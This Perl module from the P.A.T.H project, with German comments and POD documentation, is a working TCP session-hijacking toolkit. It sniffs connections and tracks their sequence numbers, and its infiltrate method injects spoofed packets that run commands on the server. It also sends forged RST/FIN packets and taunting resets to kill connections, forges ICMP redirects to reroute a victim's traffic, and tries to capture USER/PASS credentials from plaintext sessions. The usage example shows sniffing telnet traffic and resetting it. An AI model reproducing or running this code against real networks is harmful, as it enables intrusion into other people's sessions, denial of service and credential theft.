package hijack;

# Module to store all the hijacking stuff
# This modul can be run in stateful or stateless mode
# Currently it only supports TCP hijacking methods like:
# - injecting a packet
# - greet the victim client
# - resetting a connection
# - create and send a ICMP redirect message
#
# For more information please read the POD documentation
#
# Programmed by Bastian Ballmann and Stefan Krecher
#
# Last Update: 14.12.2002
#
# This code is licensed under the GPL


###[ Loading modules ]###

use NetPacket::Ethernet qw(:strip); # Decoding ethernet packets
use NetPacket::IP qw(:strip);       # Decoding IP packets
use NetPacket::TCP;                 # Decoding TCP packets
use Net::RawIP;                     # Creating raw packets
use NetAddr::IP;                    # IP conversion
use strict;
use Carp qw(croak);

###[ Konstruktor ]###

# Erstellt aus einer Net::PcapUtils Paket Referenz ein Hijack Objekt
# Zur Zeit wird nur TCP/IP unterstuetzt
# Default Modus ist stateless.
# Es wird also per default nicht zwischen Server und Client unterschieden
# Parameter: Pcap packet object
sub new
{
    my ($class, $packet) = @_;
    my $obj = {};

    # Decode packet
    my $ip = NetPacket::IP->decode(eth_strip($packet));
    my $tcp = NetPacket::TCP->decode($ip->{data});

    $obj->{src_ip} = $ip->{src_ip};         # Current source ip (stateless mode)
    $obj->{dest_ip} = $ip->{dest_ip};       # Current destination ip (stateless mode)
    $obj->{src_port} = $tcp->{src_port};    # Current source port (stateless mode)
    $obj->{dest_port} = $tcp->{dest_port};  # Current destination port (stateless mode)
    $obj->{seqnum} = $tcp->{seqnum};        # Current sequence number (stateless mode)
    $obj->{acknum} = $tcp->{acknum};        # Current acknowledgement number (stateless mode)
    $obj->{flags} = $tcp->{flags};          # Current TCP flags
    $obj->{hijacked} = [];                  # Array to store hijacked connections
    $obj->{login_flag} = 0;                 # Flag to remember if we have seen a correct login process
    $obj->{stateful} = 0;                   # Flag to remember if we run in stateless or stateful mode
    $obj->{server_ip} = "";                 # Server IP (stateful mode)
    $obj->{client_ip} = "";                 # Client IP (stateful mode)
    $obj->{server_port} = "";               # Server Port (stateful mode)
    $obj->{client_port} = "";               # Client Port (stateful mode)
    $obj->{server_seq} = "";                # Server Sequence Nummer (stateful mode)
    $obj->{server_ack} = "";                # Server Acknowledgement Nummer (stateful mode)
    $obj->{client_seq} = "";                # Client Sequence Nummer (stateful mode)
    $obj->{client_ack} = "";                # Client Acknowledgement Nummer (stateful mode)

    return bless($obj,$class);
}



###[ General methods ]###

# Methode check() ueberprueft ob das Paket zu "unser" Verbindung gehoert
# Parameter: Pcap packet object
sub check
{
    my ($obj,$packet) = @_;
    my ($src_ip,$dest_ip,$src_port,$dest_port);

    # Decode packet
    my $ip = NetPacket::IP->decode(eth_strip($packet));
    my $tcp = NetPacket::TCP->decode($ip->{data});

    # Are we running in stateful mode?
    if($obj->{stateful})
    {
	# Packet kommt vom Server zu unserem Client
	if( ($obj->{server_ip} eq $ip->{src_ip}) &&
	    ($obj->{client_ip} eq $ip->{dest_ip}) &&
	    ($obj->{server_port} eq $tcp->{src_port}) &&
	    ($obj->{client_port} eq $tcp->{dest_port}) &&
	    ($tcp->{winsize} ne "2323") )
	{
	    return 1;
	}
	# Das Paket kommt von unserem Client und will zum Server
	elsif( ($obj->{client_ip} eq $ip->{src_ip}) &&
	    ($obj->{server_ip} eq $ip->{dest_ip}) &&
	    ($obj->{client_port} eq $tcp->{src_port}) &&
	    ($obj->{server_port} eq $tcp->{dest_port}) &&
	    ($tcp->{winsize} ne "2323") )
	{
	    return 1;
	}
	else
	{
	    return 0;
	}
    }

    # We are running in stateless mode
    else
    {
	if( ($obj->{src_ip} eq $ip->{src_ip}) && 
	    ($obj->{dest_ip} eq $ip->{dest_ip}) && 
	    ($obj->{src_port} eq $tcp->{src_port}) && 
	    ($obj->{dest_port} eq $tcp->{dest_port}) &&
	    ($tcp->{winsize} ne "2323") )
	{
	    return 1;
	}
	elsif( ($obj->{src_ip} eq $ip->{dest_ip}) &&
	       ($obj->{dest_ip} eq $ip->{src_ip}) &&
	       ($obj->{src_port} eq $tcp->{dest_port}) &&
	       ($obj->{dest_port} eq $tcp->{src_port}) &&
	       ($tcp->{winsize} ne "2323") )
	{
	    return 1;
	}
	else
	{
	    return 0;
	}
    }
}


# Methode check_port ueberprueft, ob das Paket den gewuenschten Source- bzw.
# Destination Port enthaelt.
# Parameter: packet object, src and dest port
# Falls ein Port nicht interessiert, dann uebergibt man entweder 0 oder NULL
sub check_port
{
    my ($obj,$packet,$src_port,$dst_port) = @_;

    # Decode packet
    my $ip = NetPacket::IP->decode(eth_strip($packet));
    my $tcp = NetPacket::TCP->decode($ip->{data});

    # Source port interessiert nicht, check nur Destination port
    if( ($src_port == 0) || ($src_port eq "NULL") )
    {
	if($tcp->{dest_port} eq $dst_port)
	{
	    return 1;
	}
	else
	{
	    return 0;
	}
    }
    
    # Destination port interessiert nicht, check nur den Source port
    elsif( ($dst_port == 0) || ($dst_port eq "NULL") )
    {
	if($tcp->{src_port} eq $src_port)
	{
	    return 1;
	}
	else
	{
	    return 0;
	}
    }

    # Check ob beide Ports stimmen
    else
    {
	if( ($tcp->{src_port} eq $src_port) && ($tcp->{dest_port} eq $dst_port) )
	{
	    return 1;
	}
	else
	{
	    return 0;
	}
    }
}


# Die Methode check_ip ueberprueft, ob das Paket die gewuenschte Source- bzw.
# Destination IP enthaelt.
# Falls eine IP nicht interessiert, dann uebergibt man entweder 0 oder NULL
# Parameter: packet object, src and dest ip
sub check_ip
{
    my ($obj,$packet,$src_ip,$dst_ip) = @_;

    # Decode packet
    my $ip = NetPacket::IP->decode(eth_strip($packet));

    # Source IP interessiert nicht
    if( ($src_ip == 0) || ($src_ip == "NULL") )
    {
	if($dst_ip eq $ip->{dest_ip})
	{
	    return 1;
	}
	else
	{
	    return 0;
	}
    }

    # Destination IP interessiert nicht
    elsif( ($dst_ip == 0) || ($dst_ip eq "NULL") )
    {
	if($src_ip eq $ip->{src_ip})
	{
	    return 1;
	}
	else
	{
	    return 0;
	}
    }

    # Ueberpruefe beide IPs
    elsif( ($ip->{src_ip} eq $src_ip) && ($ip->{dest_ip} eq $dst_ip) )
    {
	return 1;
    }
    else
    {
	return 0;
    }
}


# Methode check_flag ueberprueft, ob das Paket das gewuenschte Flag
# gesetzt hat.
# Parameter: packet object, flag
sub check_flag
{
    my($obj,$packet,$flag) = @_;

    $flag = lc($flag);
    my %flags;

    # Decode the packet
    my $ip = NetPacket::IP->decode(eth_strip($packet));
    my $tcp = NetPacket::TCP->decode($ip->{data});
    
    $flags{urg} = 0x20;
    $flags{ack} = 0x10;
    $flags{psh} = 0x08;
    $flags{rst} = 0x04;
    $flags{syn} = 0x02;
    $flags{fin} = 0x01;

    if($tcp->{flags} & $flags{$flag})
    {
	return 1;
    }
    else
    {
	return 0;
    }
}


# Methode stateful setzt die Server / Client Eigenschaften
# Jetzt weiss unser Modul in welche Richtung ein Packet gehoert
# Parameter: Net::PcapUtils packet object, Source (server|client)
sub stateful
{
    my($obj,$packet,$src) = @_;

    # Decode packet
    my $ip = NetPacket::IP->decode(eth_strip($packet));
    my $tcp = NetPacket::TCP->decode($ip->{data});

    # Connection should be observed in stateful mode
    $obj->{stateful} = 1;

    # Das Paket kommt vom Server
    if($src eq "server")
    {
	$obj->{server_ip} = $ip->{src_ip};
	$obj->{client_ip} = $ip->{dest_ip};
	$obj->{server_port} = $tcp->{src_port};
	$obj->{client_port} = $tcp->{dest_port};
	$obj->{server_seq} = $tcp->{seqnum};
	$obj->{server_ack} = $tcp->{acknum};
    }
    elsif($src eq "client")
    {
	$obj->{server_ip} = $ip->{dest_ip};
	$obj->{client_ip} = $ip->{src_ip};
	$obj->{server_port} = $tcp->{dest_port};
	$obj->{client_port} = $tcp->{src_port};
	$obj->{client_seq} = $tcp->{seqnum};
	$obj->{client_ack} = $tcp->{acknum};
    }	
    else
    {
	print "Unkown option $src in method stateful()\n";
    }

    return $obj;
}


# Die Methode stateless gibt dem Modul bekannt, dass wir nicht mehr
# im stateful Modus laufen wollen
sub stateless
{
    my $obj = shift;
    $obj->{stateful} = 0;
    return $obj;
}



# Methode set_server_seq() speichert die Server Sequence- und Acknowledgenummer.
# Parameter: Net::PcapUtils packet object
sub set_server_seq
{
    my($obj,$packet) = @_;

    # Are we running in stateful mode?
    unless($obj->{stateful}) 
    { 
	print "You are not running in stateful mode.\n";
	print "set_server_seq() aborts!\n"; 
	return 0; 
    }

    # Decode packet
    my $ip = NetPacket::IP->decode(eth_strip($packet));
    my $tcp = NetPacket::TCP->decode($ip->{data});

    $obj->{server_seq} = $tcp->{seqnum};
    $obj->{server_ack} = $tcp->{ackum};
    return $obj;
}



# Methode set_client_seq() speichert die Client Sequence- und Acknowledgenummer.
# Parameter: Net::PcapUtils packet object
sub set_client_seq
{
    my($obj,$packet) = @_;

    # Are we running in stateful mode?
    unless($obj->{stateful}) 
    { 
	print "You are not running in stateful mode.\n";
	print "set_client_seq() aborts!\n"; 
	return 0; 
    }

    # Decode packet
    my $ip = NetPacket::IP->decode(eth_strip($packet));
    my $tcp = NetPacket::TCP->decode($ip->{data});

    $obj->{client_seq} = $tcp->{seqnum};
    $obj->{client_ack} = $tcp->{ackum};
    return $obj;
}



# Methode server_seq gibt true zurueck, wenn die Sequence- und
# Acknowledgementnummer vom Server bekannt ist
sub server_seq
{
    my $obj = shift;

    if( ($obj->{server_seq}) && ($obj->{server_ack}) && ($obj->{server_seq} != 0) && ($obj->{server_ack} != 0) )
    {
	return 1
    }
    else
    {
	return 0;
    }
}



# Methode client_seq gibt true zurueck, wenn die Sequence- und
# Acknowledgementnummer vom Client bekannt ist
sub client_seq
{
    my $obj = shift;

    if( ($obj->{client_seq}) && ($obj->{client_ack}) && ($obj->{client_seq} != 0) && ($obj->{client_ack} != 0) )
    {
	return 1;
    }
    else
    {
	return 0;
    }
}


# Methode is_established() ueberprueft ob der TCP Handshake schon erfolgt
# ist (anders gesagt, ob es sich um ein ACK Paket und nicht SYN oder 
# SYN/ACK handelt)
sub is_established
{
    my($obj,$packet) = @_;

    # Hat das Paket das SYN Flag gesetzt?
    if($obj->check_flag($packet,"syn"))
    {
	return 0;
    }
    else
    {
	return 1;
    }
}


# Die Methode logged_in() versucht einen Login Vorgang
# mit zu lesen anhand der Strings USER und PASS
# Diese Methode is noch zu buggy, um sie zu verwenden
sub logged_in
{
    my($obj,$packet) = @_;

    # Decode packet
    my $ip = NetPacket::IP->decode(eth_strip($packet));
    my $tcp = NetPacket::TCP->decode($ip->{data});
    my $payload = $tcp->{data};

    if( (($payload =~ /USER/i) || ($payload =~ /login/i)) && !($payload =~ /last\s*login/ig) )
    {
	print "Found login string\n";
	$obj->{loign_flag} = 1;
	return 0;
    }
    elsif(($payload =~ /password/i) || ($payload =~ /PASS/i))
    {
	print "Found password string\n";
	$obj->{login_flag} = 2;
	return 0;
    }
    elsif($payload =~ /last\s*login/ig)
    {
	print "Found last login message\n";
	$obj->{login_flag} = 3;
    }

    if($obj->{login_flag} == 1)
    {
	$obj->{login} = $payload;
	$obj->{login_flag} = 0;
	print "User $payload\n";
    }
    elsif($obj->{login_flag} == 2)
    {
	$obj->{password} = $payload;
	$obj->{login_flag} = 0;
	print "Password $payload\n";
    }

    if($obj->{login_flag} == 3)
    {
	print "User logged in\n";
	return 1;
    }
    else
    {
	return 0;
    }
    
}

# Methode update() updated die Objekt Eigenschaften mit den Eigenschaften
# aus einem Net::PcapUtils Paket Objekt
# Diese Methode updated die Verbindungsinformationen im stateless Modus
sub update
{
    my ($obj, $packet) = @_;

    # Are we running in stateful mode?
    if($obj->{stateful})
    {
	print "You are running in stateful mode.\n";
	print "update() aborted!\n";
	return 0;
    }

    # Decode packet
    my $ip = NetPacket::IP->decode(eth_strip($packet));
    my $tcp = NetPacket::TCP->decode($ip->{data});

    $obj->{src_ip} = $ip->{src_ip};
    $obj->{dest_ip} = $ip->{dest_ip};
    $obj->{src_port} = $tcp->{src_port};
    $obj->{dest_port} = $tcp->{dest_port};
    $obj->{seqnum} = $tcp->{seqnum};
    $obj->{acknum} = $tcp->{acknum};
    $obj->{flags} = $tcp->{flags};

    return $obj;
}



# Methode update_seq() updated nur die Sequence und
# Acknowledgement Number
# Diese Methode updated die Verbindungsinformationen im stateless Modus
sub update_seq
{
    my ($obj, $packet) = @_;

    # Are we running in stateful mode?
    if($obj->{stateful})
    {
	print "You are running in stateful mode.\n";
	print "update_seq() aborted!\n";
	return 0;
    }

    # Decode packet
    my $ip = NetPacket::IP->decode(eth_strip($packet));
    my $tcp = NetPacket::TCP->decode($ip->{data});

    $obj->{seqnum} = $tcp->{seqnum};
    $obj->{acknum} = $tcp->{acknum};

    return $obj;
}


# Methode is_hijackable ueberprueft ob die Verbindung
# gehijackt werden kann.
# Also ob die Sequence und Acknowledgement Number mit
# gelesen werden kann.
sub is_hijackable
{
    my $obj = shift;

    # Are we running in stateful mode?
    if($obj->{stateful})
    {
	if( ($obj->{client_seq}) && ($obj->{client_ack}) && ($obj->{server_seq}) && ($obj->{server_ack}) )
	{
	    return 1;
	}
	else
	{
	    return 0;
	}
    }
    # We are running in stateless mode
    else
    {
	if( ($obj->{seqnum}) && ($obj->{acknum}) )
	{
	    return 1;
	}
	else
	{
	    return 0;
	}
    }
}


# Methode is_hijacked merkt sich, dass wir die Verbindung schon gehijackt haben
# Parameter: Pcap packet object
sub is_hijacked
{
    my $obj = shift;
    my $packet = shift;

    # Decode packet
    my $ip = NetPacket::IP->decode(eth_strip($packet));
    my $tcp = NetPacket::TCP->decode($ip->{data});

    push @{$obj->{hijacked}},$ip->{src_ip} . " " . $ip->{dst_ip};
    return $obj;
}


# Diese Methode dient dazu eine oder alle IPs aus dem hijacked Array
# zu entfernen, damit die Verbidnung erneut gehijackt werden kann
# Als Parameter kann eine IP angegeben werden, die aus dem Array 
# geschmissen werden soll. Falls kein Parameter angegeben wird, wird
# das komplette Array geloescht
sub unset_hijacked
{
    my $obj = shift;
    my $src = shift;
    my $dst = shift;

    # Loesche einen Eintrag anhand der Source und Destination IP
    if(($src ne "") && ($dst ne ""))
    {
	# Durchwuehle das Hijacked Array nach der Source und Destination IP
	# Wenn sie gefunden wurde, loesche sie...
	for(my $i=0; $i < scalar(@{$obj->{hijacked}}); $i++)
	{
	    if( ($obj->{hijacked}->[$i] eq "$src $dst") || ($obj->{hijacked}->[$i] eq "$dst $src") )
	    {
		splice(@{$obj->{hijacked}},$i,$i+1);
		last;
	    }
	}
    }

    # Loesche alle Eintraege
    else
    {
	@{$obj->{hijacked}} = ();
    }

    return $obj;
}


# Methode hijacked ueberprueft, ob die Verbindung schon
# gehijackt wurde
# Parameter: Pcap packet object
sub hijacked
{
    my $obj = shift;
    my $packet = shift;

    # Decode packet
    my $ip = NetPacket::IP->decode(eth_strip($packet));
    my $tcp = NetPacket::TCP->decode($ip->{data});


    for(@{$obj->{hijacked}})
    {
	if( ($ip->{src_ip} . " " . $ip->{dst_ip} eq $_) ||  ($ip->{dst_ip} . " " . $ip->{src_ip} eq $_) )
	{
	    return 1;
	}
    }

    return 0;
}




###[ HIJACKING METHODS ]###


# Method infiltrate() infiltrates a command on server side
# Parameter: Command to infiltrate
sub infiltrate
{
    my($obj,$command) = @_;
    my $packet = new Net::RawIP;

    # Are we running in stateful mode?
    # Then inject the packet spoofed from the client to the server
    if($obj->{stateful})
    {
	$packet->set({
	    ip => {
		saddr => $obj->{client_ip},
		daddr => $obj->{server_ip}
	    },
	    tcp => {
		source => $obj->{client_port},
		dest => $obj->{server_port},
		psh => 1,
		ack => 1,
		seq => $obj->{server_ack},
		ack_seq => $obj->{client_ack},
		window => "2323",
		data => "$command\n"
		}
	});
	
    }
    # We are running in stateless mode
    else
    {
	$packet->set({
	    ip => {
		saddr => $obj->{src_ip},
		daddr => $obj->{dest_ip}
	    },
	    tcp => {
		source => $obj->{src_port},
		dest => $obj->{dest_port},
		psh => 1,
		ack => 1,
		seq => $obj->{seqnum},
		ack_seq => $obj->{acknum},
		window => "2323",
		data => "$command\n"
		}
	});

    }

    $packet->send(0,1);
}



# Methode greet_client() schickt eine Nachricht an den
# Client und resettet die Verbindung
# Diese Methode macht nur im stateful Modus Sinn
# Parameter: String fuer den armen Client
sub greet_client
{
    my($obj,$command) = @_;
    my $packet = new Net::RawIP;

    # Are we running in stateful mode?
    unless($obj->{stateful}) { print "You are not running in stateful mode!\n"; return; }

    # Create the packet...
    $packet->set({
	ip => {
	    saddr => $obj->{server_ip},
	    daddr => $obj->{client_ip}
	},
	tcp => {
	    source => $obj->{server_port},
	    dest => $obj->{client_port},
	    rst => 1,
	    seq => $obj->{client_ack},
	    ack_seq => $obj->{server_ack},
	    window => "2323",
	    data => $command
	    }
    });

    # ...and send it over the wire
    $packet->send(0,1);
}



# Create and send a Reset packet
# The first parameter to pass is a reset flag (RST|FIN)
# the second one is only necessary in stateful mode and
# tells the target direction (client|server)
sub reset
{
    my $obj = shift;
    my $flag = shift;
    my $target = shift;
    my $packet = new Net::RawIP;
    my($src_ip,$dest_ip,$src_port,$dest_port,$seqnum,$acknum);

    $flag = lc($flag);

# Are we running in stateful mode?
    if($obj->{stateful})
    {
	# Which direction should be resettet?
	if($target eq "server")
	{
	    $src_ip = $obj->{client_ip};
	    $dest_ip = $obj->{server_ip};
	    $src_port = $obj->{client_port};
	    $dest_port = $obj->{server_port};
	    $seqnum = $obj->{server_ack};
	    $acknum = $obj->{client_ack};
	}
	else
	{
	    $src_ip = $obj->{server_ip};
	    $dest_ip = $obj->{client_ip};
	    $src_port = $obj->{server_port};
	    $dest_port = $obj->{client_port};
	    $seqnum = $obj->{client_ack};
	    $acknum = $obj->{server_ack};
	}
    }
    
    # We are running in stateless mode
    else
    {
	$src_ip = $obj->{dest_ip};
	$dest_ip = $obj->{src_ip};
	$src_port = $obj->{dest_port};
	$dest_port = $obj->{src_port};
	$seqnum = $obj->{acknum};
	$acknum = $obj->{acknum};
    }


# Reset via FIN packet
    if($flag eq "fin")
    {
# Create the packet
	$packet->set({
	    ip => {
		saddr => $src_ip,
		daddr => $dest_ip
		},
		    tcp => {
			source => $src_port,
			dest => $dest_port,
			fin => 1,
			seq => $seqnum,
			ack_seq => $acknum
		    }
	});

    }
    
# Reset via RST packet
    else
    {
# Create the packet
	$packet->set({
	    ip => {
		saddr => $src_ip,
		daddr => $dest_ip
	    },
	    tcp => {
		source => $src_port,
		dest => $dest_port,
		rst => 1,
		seq => $seqnum,
		ack_seq => $acknum
	    }
	});
}

# ...and throw it on the wire!
  $packet->send(0,1);
}





###[ Special functions ]###

# Create a packet (Net::RawIP object) 
# from a config object
sub create_packet
{
    my $cfg_obj = shift;
    my (%config, $protocol,$packet);

    # Do we allready have a reference to an option hash?
    if(ref($cfg_obj) eq "HASH")
    {
	%config = %{$cfg_obj};
	$protocol = $config{'protocol'};
    }
    else
    {
	%config = $cfg_obj->get_opt();
	$protocol = $cfg_obj->get_protocol();
    }

# Create a TCP / IP packet
if($protocol eq "tcp")
{
    $packet = new Net::RawIP;
    $packet->set({
	ip => {
	    saddr => $config{'spoof'},
	    daddr => $config{'target'},
	    frag_off => $config{'frag'},
	    ttl => $config{'ttl'}
	} ,
	
	tcp => {
	    source => $config{'src_port'}, 
	    dest => $config{'dst_port'},
	    syn => $config{'syn'}, 
	    ack => $config{'ack'}, 
	    fin => $config{'fin'}, 
	    rst => $config{'rst'}, 
	    psh => $config{'psh'}, 
	    urg => $config{'urg'},
	    seq => $config{'seq'},
	    ack_seq => $config{'ack_seq'},
	    window => $config{'win'},
	    data => "$config{'data'}\r\n"
	    }
    });
}

# Create a UDP / IP packet
elsif($protocol eq "udp")
{
    $packet = new Net::RawIP({udp =>{}});
    $packet->set({
	ip => {
	    saddr => $config{'spoof'},
	    daddr => $config{'target'}
	} ,
	udp => {
	    source => $config{'src_port'}, 
	    dest => $config{'dst_port'},
	    data => "$config{'data'}\r\n"
	    }
    });
}

# Create a ICMP / IP packet
elsif($protocol eq "icmp")
{
    $packet = new Net::RawIP({icmp => {}});
    $packet->set({ 
	ip  => { ttl      => 64,
		 protocol => 1,
		 tos      => 0,
		 saddr    => $config{'spoof'},
		 daddr    => $config{'target'},
	     },
	icmp=> { type    => $config{'icmp-type'},
		 code    => $config{'icmp-code'},
		 data    => "$config{'data'}\r\n",
		 gateway => $config{'gateway'},
		 mtu => $config{'mtu'}
	     }
    });
}
# Create IP only packet
else
{
    $packet = new Net::RawIP;
    $packet->set({
	ip => {
	    saddr => $config{'spoof'},
	    daddr => $config{'target'},
	    frag_off => $config{'frag'},
	    ttl => $config{'ttl'}
	} 
    });
}

return $packet;
}

# Redirect-Message, bergeben werden IP-Addressen als Strings
# $victim: Opfer dem eine neue Route gesetzt werden soll
# $alter_gw: IP des ursprnglichen Gateways
# $neuer_gw: IP des neuen Gateway fr die spezielle Route
# $ziel_der_route: Ziel IP fr die eine Route gesetzt werden soll

sub icmp_redirect {
	my ($victim, $alter_gw, $neuer_gw, $ziel_der_route) = @_;
	my ($a, $ip, $ip_gw, $ip_gw_int);
	my @quad;
	
	# neuer Gateway
	@quad = split(/\./, $neuer_gw);
	$ip_gw = new NetAddr::IP "$quad[3].$quad[2].$quad[1].$quad[0]";
	$ip_gw_int = $ip_gw->numeric();

	# Hier wird das "ursprngliche" IP-Paket zusammengebastelt
	# der geforderte 64 Bit Payload kann weggelassen werden

	$ip = NetPacket::IP->decode('');
	$ip->{ver}      = 4;
	$ip->{src_ip}   = $victim;
	$ip->{dest_ip}  = $ziel_der_route;

	# jetzt das ICMP-Redirect Paket konstruieren

	$a = new Net::RawIP(
	{
		ip => {
			saddr   => $alter_gw,
			daddr   => $victim,
		},
		icmp => {
			type    => 5,
			code    => 1,
			# encode() berechnet angeblich die IP-Headechecksumme neu
			data    => $ip->encode(),
			gateway => $ip_gw_int 
		}
	}
	);

	# und ab aufs Kabel
	$a->send(0, 1);
	
	return 1;
}

###[ Thats the end folks =) ]###

1;


__END__

###[ POD documentation ]###

=pod
=head2 NAME

   hijack.pm  --  P.A.T.H hijacking stuff

=head2 SYNOPSIS

   use hijack;
   use NET::PcapUtils;

   Net::PcapUtils::loop(\&sniffit,
                        PROMISC => 1,
		        FILTER => 'tcp and port 23',
		        DEV => 'eth0');

   sub sniffit
   {
       unless(defined $connection)
       {
	   $connection = hijack->new($packet);
       }  

      if($connection->is_established)
      {
         if( ($connection->check($packet)) && ($connection->check_port($packet,23,0)) )
         {
	    $connection->update($packet);
	    $connection->reset('rst');
         }
      }
   }


=head2 DESCRIPTION

   This module contains all the hijacking stuff of the P.A.T.H project.
   It supports stateful and stateless hijacking, connection resetting, 
   packet infiltration and more.
   Per default the module runs in stateless mode.
   If you want to run it in stateful mode use the stateful() method first.
   Please note that this module can only handle *one* connection in *one*
   object so if you want to handle more than one connection you have to
   store one hijack object per connection in an array or something like
    that. Maybe this will change in the future... Who knows? ;)


=head2 METHODS

   new
   check
   check_port
   check_ip
   check_flag
   stateful
   stateless
   set_server_seq
   server_seq
   set_client_seq
   client_seq
   is_established
   update
   update_seq   
   is_hijackable
   is_hijacked
   hijacked
   unset_hijacked
   infiltrate
   greet_client
   reset
   create_packet


=head2 DESCRIPTION OF METHODS

=item B<new()>

   $connection = hijack->new($packet);

   This method create a new stateless hijack object.
   It takes a Net::PcapUtils packet object as parameter.


=item B<check()>

   $connection->check($packet);

   This method simply check if the packet has got the same
   source or destination port / ip as the last saved one.
   If you are running in stateful method it will check if
   the specified packet either comes from the client and is
   send to the server or the other way round.
   The method returns true if the packet belongs to "our"
   connection otherwise it will return false.


=item B<check_port>

   $connection->check_port($packet,src,dest);

   Check_port() checks if the packet has got the specified src
   and destination port.
   You can choose a 0 or NULL if the number of one port is of 
   no interest for you.
   The method returns true if the specified ports are found in
   the packet otherwise it returns false.


=item B<check_ip>

   $connection->check_ip($packet,src,dest);

   The same as check_port(), but checks the ips...


=item B<check_flag>

    $connection.>check_flag($packet,$flag);

    Check if the given flag is set in the TCP header of 
    the passed packet. If the flag is set this method
    returns true otherwise it returns false.


=item B<stateful>

   $connection->stateful($packet,[server|client]);

    This method takes two options:
    A Net::PcapUtils packet object
    A direction: server or client
    Now the module can distinguish between a client
    and a server module. You can check the dicrection
    of the captured packet with the check_port() method.

=item B<stateless>

    $connection->stateless();

    This method tells the module that we dont want to run
    in stateful mode any more.

=item B<set_server_seq()>

   $connection->set_server_seq($packet);

    Save the sequence and acknowledgement number in the packet
    as server seq and ack.
    There is also a set_client_seq method.

=item B<server_seq()>

   $connection->server_seq()

    Returns true if the server sequence and acknowledgment number
    is known.
    There is also a client_seq method.
    This method does only make sense if you are running in stateful
    mode!


=item B<update()>

    $connection->update($packet);

    This method updates connection information in stateless 
    connection hijacking.
    Use update_seq if you only want to update the sequence and
    acknowledgement numbers.

=item B<is_hijackable()>

    $connection->is_hijackable();

    Returns true if you can sniff the sequence and acknowledgement numbers.


=item B<is_hijacked>

    $connection->is_hijacked();

    Remember that you have already hijacked the connection.
    Use the hijacked() method to check if a connection was marked
    as hijacked before.

=item B<unset_hijacked>

    $connection->unset_hijacked($src_ip,$dst_ip);

    Remove the specified source and destination ip from the
    hijacked array so we can hijack the connection again.
    If no parameter is specified all hijacked connection are
    deleted!


=item B<infiltrate()>

    $connection->infiltrate($command);

    This method will send a spoofed packet from the client to the
    server with the specified payload.
    In stateful mode this method injects the command to the server
    otherwise to the last specified destination ip and port.

=item B<greet_client()>

    $connection->greet_client("Hello lamer! Nice weather outside! =)");

    Use this method if you want to send a message to the client.
    This method can only be used in the stateful method.

=item B<reset()>

   $connection->reset($flag,$direction);

   The first parameter to pass is a reset flag (RST|FIN)
   the second one is only necessary in stateful mode and
   tells the target direction (client|server)

=item B<create_packet()>

    $packet = $connection->create_packet($cfg);

    This methods takes a config object to create and return a
    Net::RawIP packet object.
    See config module documentation for more information.


=head2 BUGS

    Debug the following methods:
    logged_in


=head2 AUTHOR

    Bastian Ballmann [ bytebeater@crazydj.de ]
    http://www.crazydj.de


=head2 COPYRIGHT

    This module is free software.
    Its licensed under the GPL.

